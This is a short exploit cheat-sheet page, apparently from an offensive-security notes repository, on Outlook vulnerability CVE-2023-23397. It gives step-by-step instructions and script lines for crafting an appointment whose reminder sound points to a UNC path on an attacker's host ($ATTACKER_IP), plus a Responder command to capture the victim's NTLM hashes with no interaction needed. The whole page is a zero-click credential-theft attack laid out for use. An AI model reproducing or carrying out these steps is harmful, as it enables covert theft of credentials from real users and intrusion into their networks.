killchain-compendium/Exploits/Windows/Outlook.md

1.2 KiB

Outlook Exploits

CVE-2023-23397

Create an Appointment with a custom and malicious reminder sound. The sound file download uses Universal Naming Convention (UNC) paths to refrence the file. The file is stored on a server controlled by the attacker. Goal is to get the NTLM(v2) Hashes. There needs to be no interaction by the target.

Therefore, PidLidReminderFileParameter have to be altered containing the UNC, for example \\$ATTACKER_IP:$ATTACKER_PORT\payload.wav. The source of the file may use SMB or WebDAV. Further, PidLidReminderOverride has to be set to true.

Usage

New Appointment --> set Reminder to 0 minutes.

Outlook Spy plugin is needed. Go to OutlookSpy tab, press CurrentItem and go to Script

Set the following variables:

AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = "\\$ATTACKER_IP\payloads\alert.wav"
  • Set up responder -I <interface> to catch the NTLM hash.

Press Run to save the variables. Send the appointment afterwards.

Resources